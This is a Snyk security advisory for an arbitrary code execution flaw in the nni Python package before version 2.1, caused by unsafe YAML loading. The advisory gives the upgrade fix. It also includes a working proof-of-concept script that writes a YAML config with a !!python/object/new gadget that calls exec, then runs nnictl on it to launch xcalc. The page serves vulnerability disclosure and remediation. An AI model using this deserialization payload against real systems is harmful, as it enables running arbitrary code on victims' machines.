Arbitrary Code Execution Affecting nni package, versions [,2.1)
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsSnyk Learn
Learn about Arbitrary Code Execution vulnerabilities in an interactive lesson.
Start learning- Snyk IDSNYK-PYTHON-NNI-1073630
- published10 Mar 2021
- disclosed12 Feb 2021
- creditAbhiram V, Ajmal Aboobacker
Introduced: 12 Feb 2021
CVE NOT AVAILABLE CWE-94 (opens in a new tab)How to fix?
Upgrade nni to version 2.1 or higher.
Overview
nni is a Neural Network Intelligence package
Affected versions of this package are vulnerable to Arbitrary Code Execution. Arbitrary code execution is possible due to a use of a known vulnerable function load() within yaml parsing.
PoC
1. Create the following PoC file: exploit.pyimport os os.system('pip3 install nni') exploit = """authorName: !!python/object/new:type args: ["z", !!python/tuple [], {"extend": !!python/name:exec }] listitems: "import('os').system('xcalc')" experimentName: example_mnist_pytorch trialConcurrency: 1 maxExecDuration: 1h maxTrialNum: 10 #choice: local, remote, pai trainingServicePlatform: local searchSpacePath: search_space.json #choice: true, false useAnnotation: false tuner: #choice: TPE, Random, Anneal, Evolution, BatchTuner, MetisTuner, GPTuner #SMAC (SMAC should be installed through nnictl) builtinTunerName: TPE classArgs: #choice: maximize, minimize optimize_mode: maximize trial: command: python3 mnist.py codeDir: . gpuNum: 0 """ open('exploit.yml','w+').write(exploit) os.system('nnictl create --config exploit.yml')
- Execute the following commands in another terminal: python3 exploit.py
Check the Output: xcalc will pop up.